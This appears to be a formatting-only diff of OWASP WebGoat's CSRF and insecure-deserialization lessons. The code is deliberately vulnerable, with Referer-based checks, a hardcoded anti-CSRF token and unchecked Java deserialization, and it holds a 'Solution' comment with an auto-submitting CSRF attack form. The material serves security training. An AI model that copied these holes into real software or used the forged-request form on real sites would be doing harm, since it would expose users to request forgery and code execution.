--- a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFConfirmFlag1.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFConfirmFlag1.java
@@ -31,28 +31,26 @@ import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-/**
- * Created by jason on 9/29/17.
- */
-
+/** Created by jason on 9/29/17. */
 @RestController
 @AssignmentHints({"csrf-get.hint1", "csrf-get.hint2", "csrf-get.hint3", "csrf-get.hint4"})
 public class CSRFConfirmFlag1 extends AssignmentEndpoint {
 
-    @Autowired
-    UserSessionData userSessionData;
+  @Autowired UserSessionData userSessionData;
 
-    @PostMapping(path = "/csrf/confirm-flag-1", produces = {"application/json"})
-    @ResponseBody
-    public AttackResult completed(String confirmFlagVal) {
-        Object userSessionDataStr = userSessionData.getValue("csrf-get-success");
-        if (userSessionDataStr != null && confirmFlagVal.equals(userSessionDataStr.toString())) {
-            return success(this)
-                    .feedback("csrf-get-null-referer.success")
-                    .output("Correct, the flag was " + userSessionData.getValue("csrf-get-success"))
-                    .build();
-        }
-
-        return failed(this).build();
+  @PostMapping(
+      path = "/csrf/confirm-flag-1",
+      produces = {"application/json"})
+  @ResponseBody
+  public AttackResult completed(String confirmFlagVal) {
+    Object userSessionDataStr = userSessionData.getValue("csrf-get-success");
+    if (userSessionDataStr != null && confirmFlagVal.equals(userSessionDataStr.toString())) {
+      return success(this)
+          .feedback("csrf-get-null-referer.success")
+          .output("Correct, the flag was " + userSessionData.getValue("csrf-get-success"))
+          .build();
     }
+
+    return failed(this).build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
index 3e5a0f109..a5387efd0 100644
--- a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
@@ -24,6 +24,11 @@ package org.owasp.webgoat.lessons.csrf;
 
 import com.fasterxml.jackson.databind.DeserializationFeature;
 import com.fasterxml.jackson.databind.ObjectMapper;
+import java.io.IOException;
+import java.util.Map;
+import java.util.UUID;
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
 import org.apache.commons.lang3.exception.ExceptionUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -37,12 +42,6 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.Cookie;
-import javax.servlet.http.HttpServletRequest;
-import java.io.IOException;
-import java.util.Map;
-import java.util.UUID;
-
 /**
  * @author nbaars
  * @since 11/17/17.
@@ -51,70 +50,72 @@ import java.util.UUID;
 @AssignmentHints({"csrf-feedback-hint1", "csrf-feedback-hint2", "csrf-feedback-hint3"})
 public class CSRFFeedback extends AssignmentEndpoint {
 
-    @Autowired
-    private UserSessionData userSessionData;
-    @Autowired
-    private ObjectMapper objectMapper;
+  @Autowired private UserSessionData userSessionData;
+  @Autowired private ObjectMapper objectMapper;
 
-    @PostMapping(value = "/csrf/feedback/message", produces = {"application/json"})
-    @ResponseBody
-    public AttackResult completed(HttpServletRequest request, @RequestBody String feedback) {
-        try {
-            objectMapper.enable(DeserializationFeature.FAIL_ON_IGNORED_PROPERTIES);
-            objectMapper.enable(DeserializationFeature.FAIL_ON_NULL_FOR_PRIMITIVES);
-            objectMapper.enable(DeserializationFeature.FAIL_ON_NUMBERS_FOR_ENUMS);
-            objectMapper.enable(DeserializationFeature.FAIL_ON_READING_DUP_TREE_KEY);
-            objectMapper.enable(DeserializationFeature.FAIL_ON_MISSING_CREATOR_PROPERTIES);
-            objectMapper.enable(DeserializationFeature.FAIL_ON_TRAILING_TOKENS);
-            objectMapper.readValue(feedback.getBytes(), Map.class);
-        } catch (IOException e) {
-            return failed(this).feedback(ExceptionUtils.getStackTrace(e)).build();
-        }
-        boolean correctCSRF = requestContainsWebGoatCookie(request.getCookies()) && request.getContentType().contains(MediaType.TEXT_PLAIN_VALUE);
-        correctCSRF &= hostOrRefererDifferentHost(request);
-        if (correctCSRF) {
-            String flag = UUID.randomUUID().toString();
-            userSessionData.setValue("csrf-feedback", flag);
-            return success(this).feedback("csrf-feedback-success").feedbackArgs(flag).build();
-        }
-        return failed(this).build();
+  @PostMapping(
+      value = "/csrf/feedback/message",
+      produces = {"application/json"})
+  @ResponseBody
+  public AttackResult completed(HttpServletRequest request, @RequestBody String feedback) {
+    try {
+      objectMapper.enable(DeserializationFeature.FAIL_ON_IGNORED_PROPERTIES);
+      objectMapper.enable(DeserializationFeature.FAIL_ON_NULL_FOR_PRIMITIVES);
+      objectMapper.enable(DeserializationFeature.FAIL_ON_NUMBERS_FOR_ENUMS);
+      objectMapper.enable(DeserializationFeature.FAIL_ON_READING_DUP_TREE_KEY);
+      objectMapper.enable(DeserializationFeature.FAIL_ON_MISSING_CREATOR_PROPERTIES);
+      objectMapper.enable(DeserializationFeature.FAIL_ON_TRAILING_TOKENS);
+      objectMapper.readValue(feedback.getBytes(), Map.class);
+    } catch (IOException e) {
+      return failed(this).feedback(ExceptionUtils.getStackTrace(e)).build();
     }
-
-    @PostMapping(path = "/csrf/feedback", produces = "application/json")
-    @ResponseBody
-    public AttackResult flag(@RequestParam("confirmFlagVal") String flag) {
-        if (flag.equals(userSessionData.getValue("csrf-feedback"))) {
-            return success(this).build();
-        } else {
-            return failed(this).build();
-        }
+    boolean correctCSRF =
+        requestContainsWebGoatCookie(request.getCookies())
+            && request.getContentType().contains(MediaType.TEXT_PLAIN_VALUE);
+    correctCSRF &= hostOrRefererDifferentHost(request);
+    if (correctCSRF) {
+      String flag = UUID.randomUUID().toString();
+      userSessionData.setValue("csrf-feedback", flag);
+      return success(this).feedback("csrf-feedback-success").feedbackArgs(flag).build();
     }
+    return failed(this).build();
+  }
 
-    private boolean hostOrRefererDifferentHost(HttpServletRequest request) {
-        String referer = request.getHeader("Referer");
-        String host = request.getHeader("Host");
-        if (referer != null) {
-            return !referer.contains(host);
-        } else {
-            return true;
-        }
+  @PostMapping(path = "/csrf/feedback", produces = "application/json")
+  @ResponseBody
+  public AttackResult flag(@RequestParam("confirmFlagVal") String flag) {
+    if (flag.equals(userSessionData.getValue("csrf-feedback"))) {
+      return success(this).build();
+    } else {
+      return failed(this).build();
     }
+  }
 
-    private boolean requestContainsWebGoatCookie(Cookie[] cookies) {
-        if (cookies != null) {
-            for (Cookie c : cookies) {
-                if (c.getName().equals("JSESSIONID")) {
-                    return true;
-                }
-            }
-        }
-        return false;
+  private boolean hostOrRefererDifferentHost(HttpServletRequest request) {
+    String referer = request.getHeader("Referer");
+    String host = request.getHeader("Host");
+    if (referer != null) {
+      return !referer.contains(host);
+    } else {
+      return true;
     }
+  }
 
-    /** Solution
-     <form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST">
-     <input type="hidden" name='{"name": "Test", "email": "test1233@dfssdf.de", "subject": "service", "message":"dsaffd"}'>
-     </form>
-     <script>document.attack.submit();</script>
-     */
+  private boolean requestContainsWebGoatCookie(Cookie[] cookies) {
+    if (cookies != null) {
+      for (Cookie c : cookies) {
+        if (c.getName().equals("JSESSIONID")) {
+          return true;
+        }
+      }
+    }
+    return false;
+  }
+
+  /**
+   * Solution <form name="attack" enctype="text/plain"
+   * action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> <input
+   * type="hidden" name='{"name": "Test", "email": "test1233@dfssdf.de", "subject": "service",
+   * "message":"dsaffd"}'> </form> <script>document.attack.submit();</script>
+   */
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFGetFlag.java b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFGetFlag.java
index 857df9997..e2cbc90c7 100644
--- a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFGetFlag.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFGetFlag.java
@@ -22,6 +22,10 @@
 
 package org.owasp.webgoat.lessons.csrf;
 
+import java.util.HashMap;
+import java.util.Map;
+import java.util.Random;
+import javax.servlet.http.HttpServletRequest;
 import org.owasp.webgoat.container.i18n.PluginMessages;
 import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.beans.factory.annotation.Autowired;
@@ -30,60 +34,52 @@ import org.springframework.web.bind.annotation.RequestMethod;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletRequest;
-import java.util.HashMap;
-import java.util.Map;
-import java.util.Random;
-
-/**
- * Created by jason on 9/30/17.
- */
+/** Created by jason on 9/30/17. */
 @RestController
 public class CSRFGetFlag {
 
-    @Autowired
-    UserSessionData userSessionData;
-    @Autowired
-    private PluginMessages pluginMessages;
+  @Autowired UserSessionData userSessionData;
+  @Autowired private PluginMessages pluginMessages;
 
-    @RequestMapping(path = "/csrf/basic-get-flag", produces = {"application/json"}, method = RequestMethod.POST)
-    @ResponseBody
-    public Map<String, Object> invoke(HttpServletRequest req) {
+  @RequestMapping(
+      path = "/csrf/basic-get-flag",
+      produces = {"application/json"},
+      method = RequestMethod.POST)
+  @ResponseBody
+  public Map<String, Object> invoke(HttpServletRequest req) {
 
-        Map<String, Object> response = new HashMap<>();
+    Map<String, Object> response = new HashMap<>();
 
-        String host = (req.getHeader("host") == null) ? "NULL" : req.getHeader("host");
-        String referer = (req.getHeader("referer") == null) ? "NULL" : req.getHeader("referer");
-        String[] refererArr = referer.split("/");
-
-
-        if (referer.equals("NULL")) {
-            if ("true".equals(req.getParameter("csrf"))) {
-                Random random = new Random();
-                userSessionData.setValue("csrf-get-success", random.nextInt(65536));
-                response.put("success", true);
-                response.put("message", pluginMessages.getMessage("csrf-get-null-referer.success"));
-                response.put("flag", userSessionData.getValue("csrf-get-success"));
-            } else {
-                Random random = new Random();
-                userSessionData.setValue("csrf-get-success", random.nextInt(65536));
-                response.put("success", true);
-                response.put("message", pluginMessages.getMessage("csrf-get-other-referer.success"));
-                response.put("flag", userSessionData.getValue("csrf-get-success"));
-            }
-        } else if (refererArr[2].equals(host)) {
-            response.put("success", false);
-            response.put("message", "Appears the request came from the original host");
-            response.put("flag", null);
-        } else {
-            Random random = new Random();
-            userSessionData.setValue("csrf-get-success", random.nextInt(65536));
-            response.put("success", true);
-            response.put("message", pluginMessages.getMessage("csrf-get-other-referer.success"));
-            response.put("flag", userSessionData.getValue("csrf-get-success"));
-        }
-
-        return response;
+    String host = (req.getHeader("host") == null) ? "NULL" : req.getHeader("host");
+    String referer = (req.getHeader("referer") == null) ? "NULL" : req.getHeader("referer");
+    String[] refererArr = referer.split("/");
 
+    if (referer.equals("NULL")) {
+      if ("true".equals(req.getParameter("csrf"))) {
+        Random random = new Random();
+        userSessionData.setValue("csrf-get-success", random.nextInt(65536));
+        response.put("success", true);
+        response.put("message", pluginMessages.getMessage("csrf-get-null-referer.success"));
+        response.put("flag", userSessionData.getValue("csrf-get-success"));
+      } else {
+        Random random = new Random();
+        userSessionData.setValue("csrf-get-success", random.nextInt(65536));
+        response.put("success", true);
+        response.put("message", pluginMessages.getMessage("csrf-get-other-referer.success"));
+        response.put("flag", userSessionData.getValue("csrf-get-success"));
+      }
+    } else if (refererArr[2].equals(host)) {
+      response.put("success", false);
+      response.put("message", "Appears the request came from the original host");
+      response.put("flag", null);
+    } else {
+      Random random = new Random();
+      userSessionData.setValue("csrf-get-success", random.nextInt(65536));
+      response.put("success", true);
+      response.put("message", pluginMessages.getMessage("csrf-get-other-referer.success"));
+      response.put("flag", userSessionData.getValue("csrf-get-success"));
     }
+
+    return response;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFLogin.java b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFLogin.java
index 238886b23..08d226245 100644
--- a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFLogin.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFLogin.java
@@ -22,6 +22,7 @@
 
 package org.owasp.webgoat.lessons.csrf;
 
+import javax.servlet.http.HttpServletRequest;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -31,8 +32,6 @@ import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletRequest;
-
 /**
  * @author nbaars
  * @since 11/17/17.
@@ -41,26 +40,29 @@ import javax.servlet.http.HttpServletRequest;
 @AssignmentHints({"csrf-login-hint1", "csrf-login-hint2", "csrf-login-hint3"})
 public class CSRFLogin extends AssignmentEndpoint {
 
-    private final UserTrackerRepository userTrackerRepository;
+  private final UserTrackerRepository userTrackerRepository;
 
-    public CSRFLogin(UserTrackerRepository userTrackerRepository) {
-        this.userTrackerRepository = userTrackerRepository;
-    }
+  public CSRFLogin(UserTrackerRepository userTrackerRepository) {
+    this.userTrackerRepository = userTrackerRepository;
+  }
 
-    @PostMapping(path = "/csrf/login", produces = {"application/json"})
-    @ResponseBody
-    public AttackResult completed(HttpServletRequest request) {
-        String userName = request.getUserPrincipal().getName();
-        if (userName.startsWith("csrf")) {
-            markAssignmentSolvedWithRealUser(userName.substring("csrf-".length()));
-            return success(this).feedback("csrf-login-success").build();
-        }
-        return failed(this).feedback("csrf-login-failed").feedbackArgs(userName).build();
+  @PostMapping(
+      path = "/csrf/login",
+      produces = {"application/json"})
+  @ResponseBody
+  public AttackResult completed(HttpServletRequest request) {
+    String userName = request.getUserPrincipal().getName();
+    if (userName.startsWith("csrf")) {
+      markAssignmentSolvedWithRealUser(userName.substring("csrf-".length()));
+      return success(this).feedback("csrf-login-success").build();
     }
+    return failed(this).feedback("csrf-login-failed").feedbackArgs(userName).build();
+  }
 
-    private void markAssignmentSolvedWithRealUser(String username) {
-        UserTracker userTracker = userTrackerRepository.findByUser(username);
-        userTracker.assignmentSolved(getWebSession().getCurrentLesson(), this.getClass().getSimpleName());
-        userTrackerRepository.save(userTracker);
-    }
+  private void markAssignmentSolvedWithRealUser(String username) {
+    UserTracker userTracker = userTrackerRepository.findByUser(username);
+    userTracker.assignmentSolved(
+        getWebSession().getCurrentLesson(), this.getClass().getSimpleName());
+    userTrackerRepository.save(userTracker);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/csrf/ForgedReviews.java b/src/main/java/org/owasp/webgoat/lessons/csrf/ForgedReviews.java
index b65691ac2..c11d43c5e 100644
--- a/src/main/java/org/owasp/webgoat/lessons/csrf/ForgedReviews.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/ForgedReviews.java
@@ -22,7 +22,17 @@
 
 package org.owasp.webgoat.lessons.csrf;
 
+import static org.springframework.http.MediaType.ALL_VALUE;
+
 import com.google.common.collect.Lists;
+import java.time.LocalDateTime;
+import java.time.format.DateTimeFormatter;
+import java.util.ArrayList;
+import java.util.Collection;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Map;
+import javax.servlet.http.HttpServletRequest;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -34,80 +44,75 @@ import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletRequest;
-import java.time.LocalDateTime;
-import java.time.format.DateTimeFormatter;
-import java.util.ArrayList;
-import java.util.Collection;
-import java.util.HashMap;
-import java.util.List;
-import java.util.Map;
-
-import static org.springframework.http.MediaType.ALL_VALUE;
-
 @RestController
 @AssignmentHints({"csrf-review-hint1", "csrf-review-hint2", "csrf-review-hint3"})
 public class ForgedReviews extends AssignmentEndpoint {
 
-    @Autowired
-    private WebSession webSession;
-    private static DateTimeFormatter fmt = DateTimeFormatter.ofPattern("yyyy-MM-dd, HH:mm:ss");
+  @Autowired private WebSession webSession;
+  private static DateTimeFormatter fmt = DateTimeFormatter.ofPattern("yyyy-MM-dd, HH:mm:ss");
 
-    private static final Map<String, List<Review>> userReviews = new HashMap<>();
-    private static final List<Review> REVIEWS = new ArrayList<>();
-    private static final String weakAntiCSRF = "2aa14227b9a13d0bede0388a7fba9aa9";
+  private static final Map<String, List<Review>> userReviews = new HashMap<>();
+  private static final List<Review> REVIEWS = new ArrayList<>();
+  private static final String weakAntiCSRF = "2aa14227b9a13d0bede0388a7fba9aa9";
 
+  static {
+    REVIEWS.add(
+        new Review("secUriTy", LocalDateTime.now().format(fmt), "This is like swiss cheese", 0));
+    REVIEWS.add(new Review("webgoat", LocalDateTime.now().format(fmt), "It works, sorta", 2));
+    REVIEWS.add(new Review("guest", LocalDateTime.now().format(fmt), "Best, App, Ever", 5));
+    REVIEWS.add(
+        new Review(
+            "guest",
+            LocalDateTime.now().format(fmt),
+            "This app is so insecure, I didn't even post this review, can you pull that off too?",
+            1));
+  }
 
-    static {
-        REVIEWS.add(new Review("secUriTy", LocalDateTime.now().format(fmt), "This is like swiss cheese", 0));
-        REVIEWS.add(new Review("webgoat", LocalDateTime.now().format(fmt), "It works, sorta", 2));
-        REVIEWS.add(new Review("guest", LocalDateTime.now().format(fmt), "Best, App, Ever", 5));
-        REVIEWS.add(new Review("guest", LocalDateTime.now().format(fmt), "This app is so insecure, I didn't even post this review, can you pull that off too?", 1));
+  @GetMapping(
+      path = "/csrf/review",
+      produces = MediaType.APPLICATION_JSON_VALUE,
+      consumes = ALL_VALUE)
+  @ResponseBody
+  public Collection<Review> retrieveReviews() {
+    Collection<Review> allReviews = Lists.newArrayList();
+    Collection<Review> newReviews = userReviews.get(webSession.getUserName());
+    if (newReviews != null) {
+      allReviews.addAll(newReviews);
     }
 
-    @GetMapping(path = "/csrf/review", produces = MediaType.APPLICATION_JSON_VALUE, consumes = ALL_VALUE)
-    @ResponseBody
-    public Collection<Review> retrieveReviews() {
-        Collection<Review> allReviews = Lists.newArrayList();
-        Collection<Review> newReviews = userReviews.get(webSession.getUserName());
-        if (newReviews != null) {
-            allReviews.addAll(newReviews);
-        }
+    allReviews.addAll(REVIEWS);
 
-        allReviews.addAll(REVIEWS);
+    return allReviews;
+  }
 
-        return allReviews;
+  @PostMapping("/csrf/review")
+  @ResponseBody
+  public AttackResult createNewReview(
+      String reviewText, Integer stars, String validateReq, HttpServletRequest request) {
+    final String host = (request.getHeader("host") == null) ? "NULL" : request.getHeader("host");
+    final String referer =
+        (request.getHeader("referer") == null) ? "NULL" : request.getHeader("referer");
+    final String[] refererArr = referer.split("/");
+
+    Review review = new Review();
+    review.setText(reviewText);
+    review.setDateTime(LocalDateTime.now().format(fmt));
+    review.setUser(webSession.getUserName());
+    review.setStars(stars);
+    var reviews = userReviews.getOrDefault(webSession.getUserName(), new ArrayList<>());
+    reviews.add(review);
+    userReviews.put(webSession.getUserName(), reviews);
+    // short-circuit
+    if (validateReq == null || !validateReq.equals(weakAntiCSRF)) {
+      return failed(this).feedback("csrf-you-forgot-something").build();
     }
-
-    @PostMapping("/csrf/review")
-    @ResponseBody
-    public AttackResult createNewReview(String reviewText, Integer stars, String validateReq, HttpServletRequest request) {
-        final String host = (request.getHeader("host") == null) ? "NULL" : request.getHeader("host");
-        final String referer = (request.getHeader("referer") == null) ? "NULL" : request.getHeader("referer");
-        final String[] refererArr = referer.split("/");
-
-        Review review = new Review();
-        review.setText(reviewText);
-        review.setDateTime(LocalDateTime.now().format(fmt));
-        review.setUser(webSession.getUserName());
-        review.setStars(stars);
-        var reviews = userReviews.getOrDefault(webSession.getUserName(), new ArrayList<>());
-        reviews.add(review);
-        userReviews.put(webSession.getUserName(), reviews);
-        //short-circuit
-        if (validateReq == null || !validateReq.equals(weakAntiCSRF)) {
-            return failed(this).feedback("csrf-you-forgot-something").build();
-        }
-        //we have the spoofed files
-        if (referer != "NULL" && refererArr[2].equals(host)) {
-            return failed(this).feedback("csrf-same-host").build();
-        } else {
-            return success(this).feedback("csrf-review.success").build(); //feedback("xss-stored-comment-failure")
-        }
+    // we have the spoofed files
+    if (referer != "NULL" && refererArr[2].equals(host)) {
+      return failed(this).feedback("csrf-same-host").build();
+    } else {
+      return success(this)
+          .feedback("csrf-review.success")
+          .build(); // feedback("xss-stored-comment-failure")
     }
+  }
 }
-
-
-
-
-
diff --git a/src/main/java/org/owasp/webgoat/lessons/csrf/Review.java b/src/main/java/org/owasp/webgoat/lessons/csrf/Review.java
index 06e623791..0cb2a5ce1 100644
--- a/src/main/java/org/owasp/webgoat/lessons/csrf/Review.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/Review.java
@@ -22,13 +22,12 @@
 
 package org.owasp.webgoat.lessons.csrf;
 
+import javax.xml.bind.annotation.XmlRootElement;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import lombok.NoArgsConstructor;
 import lombok.Setter;
 
-import javax.xml.bind.annotation.XmlRootElement;
-
 /**
  * @author nbaars
  * @since 4/8/17.
@@ -39,9 +38,8 @@ import javax.xml.bind.annotation.XmlRootElement;
 @NoArgsConstructor
 @XmlRootElement
 public class Review {
-    private String user;
-    private String dateTime;
-    private String text;
-    private Integer stars;
+  private String user;
+  private String dateTime;
+  private String text;
+  private Integer stars;
 }
-
diff --git a/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserialization.java b/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserialization.java
index 008fb90a2..39083406a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserialization.java
+++ b/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserialization.java
@@ -8,25 +8,26 @@ import org.springframework.stereotype.Component;
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author WebGoat
@@ -35,13 +36,13 @@ import org.springframework.stereotype.Component;
  */
 @Component
 public class InsecureDeserialization extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A8;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A8;
+  }
 
-    @Override
-    public String getTitle() {
-        return "insecure-deserialization.title";
-    }
+  @Override
+  public String getTitle() {
+    return "insecure-deserialization.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserializationTask.java b/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserializationTask.java
index f207b45ef..d44823fdc 100644
--- a/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserializationTask.java
+++ b/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserializationTask.java
@@ -22,6 +22,11 @@
 
 package org.owasp.webgoat.lessons.deserialization;
 
+import java.io.ByteArrayInputStream;
+import java.io.IOException;
+import java.io.InvalidClassException;
+import java.io.ObjectInputStream;
+import java.util.Base64;
 import org.dummy.insecure.framework.VulnerableTaskHolder;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -31,51 +36,50 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.io.ByteArrayInputStream;
-import java.io.IOException;
-import java.io.InvalidClassException;
-import java.io.ObjectInputStream;
-import java.util.Base64;
-
 @RestController
-@AssignmentHints({"insecure-deserialization.hints.1", "insecure-deserialization.hints.2", "insecure-deserialization.hints.3"})
+@AssignmentHints({
+  "insecure-deserialization.hints.1",
+  "insecure-deserialization.hints.2",
+  "insecure-deserialization.hints.3"
+})
 public class InsecureDeserializationTask extends AssignmentEndpoint {
 
-    @PostMapping("/InsecureDeserialization/task")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String token) throws IOException {
-        String b64token;
-        long before;
-        long after;
-        int delay;
+  @PostMapping("/InsecureDeserialization/task")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String token) throws IOException {
+    String b64token;
+    long before;
+    long after;
+    int delay;
 
-        b64token = token.replace('-', '+').replace('_', '/');
+    b64token = token.replace('-', '+').replace('_', '/');
 
-        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(b64token)))) {
-            before = System.currentTimeMillis();
-            Object o = ois.readObject();
-            if (!(o instanceof VulnerableTaskHolder)) {
-                if (o instanceof String) {
-                    return failed(this).feedback("insecure-deserialization.stringobject").build();
-                }
-                return failed(this).feedback("insecure-deserialization.wrongobject").build();
-            }
-            after = System.currentTimeMillis();
-        } catch (InvalidClassException e) {
-            return failed(this).feedback("insecure-deserialization.invalidversion").build();
-        } catch (IllegalArgumentException e) {
-            return failed(this).feedback("insecure-deserialization.expired").build();
-        } catch (Exception e) {
-            return failed(this).feedback("insecure-deserialization.invalidversion").build();
+    try (ObjectInputStream ois =
+        new ObjectInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(b64token)))) {
+      before = System.currentTimeMillis();
+      Object o = ois.readObject();
+      if (!(o instanceof VulnerableTaskHolder)) {
+        if (o instanceof String) {
+          return failed(this).feedback("insecure-deserialization.stringobject").build();
         }
-
-        delay = (int) (after - before);
-        if (delay > 7000) {
-            return failed(this).build();
-        }
-        if (delay < 3000) {
-            return failed(this).build();
-        }
-        return success(this).build();
+        return failed(this).feedback("insecure-deserialization.wrongobject").build();
+      }
+      after = System.currentTimeMillis();
+    } catch (InvalidClassException e) {
+      return failed(this).feedback("insecure-deserialization.invalidversion").build();
+    } catch (IllegalArgumentException e) {
+      return failed(this).feedback("insecure-deserialization.expired").build();
+    } catch (Exception e) {
+      return failed(this).feedback("insecure-deserialization.invalidversion").build();
     }
+
+    delay = (int) (after - before);
+    if (delay > 7000) {
+      return failed(this).build();
+    }
+    if (delay < 3000) {
+      return failed(this).build();
+    }
+    return success(this).build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/deserialization/SerializationHelper.java b/src/main/java/org/owasp/webgoat/lessons/deserialization/SerializationHelper.java
index f6ac82bb3..a8b55ab40 100644
--- a/src/main/java/org/owasp/webgoat/lessons/deserialization/SerializationHelper.java
+++ b/src/main/java/org/owasp/webgoat/lessons/deserialization/SerializationHelper.java
@@ -11,44 +11,41 @@ import java.util.Base64;
 
 public class SerializationHelper {
 
-    private static final char[] hexArray = "0123456789ABCDEF".toCharArray();
+  private static final char[] hexArray = "0123456789ABCDEF".toCharArray();
 
-    public static Object fromString(String s) throws IOException,
-            ClassNotFoundException {
-        byte[] data = Base64.getDecoder().decode(s);
-        ObjectInputStream ois = new ObjectInputStream(
-                new ByteArrayInputStream(data));
-        Object o = ois.readObject();
-        ois.close();
-        return o;
+  public static Object fromString(String s) throws IOException, ClassNotFoundException {
+    byte[] data = Base64.getDecoder().decode(s);
+    ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
+    Object o = ois.readObject();
+    ois.close();
+    return o;
+  }
+
+  public static String toString(Serializable o) throws IOException {
+
+    ByteArrayOutputStream baos = new ByteArrayOutputStream();
+    ObjectOutputStream oos = new ObjectOutputStream(baos);
+    oos.writeObject(o);
+    oos.close();
+    return Base64.getEncoder().encodeToString(baos.toByteArray());
+  }
+
+  public static String show() throws IOException {
+    ByteArrayOutputStream baos = new ByteArrayOutputStream();
+    DataOutputStream dos = new DataOutputStream(baos);
+    dos.writeLong(-8699352886133051976L);
+    dos.close();
+    byte[] longBytes = baos.toByteArray();
+    return bytesToHex(longBytes);
+  }
+
+  public static String bytesToHex(byte[] bytes) {
+    char[] hexChars = new char[bytes.length * 2];
+    for (int j = 0; j < bytes.length; j++) {
+      int v = bytes[j] & 0xFF;
+      hexChars[j * 2] = hexArray[v >>> 4];
+      hexChars[j * 2 + 1] = hexArray[v & 0x0F];
     }
-
-    public static String toString(Serializable o) throws IOException {
-
-        ByteArrayOutputStream baos = new ByteArrayOutputStream();
-        ObjectOutputStream oos = new ObjectOutputStream(baos);
-        oos.writeObject(o);
-        oos.close();
-        return Base64.getEncoder().encodeToString(baos.toByteArray());
-    }
-
-    public static String show() throws IOException {
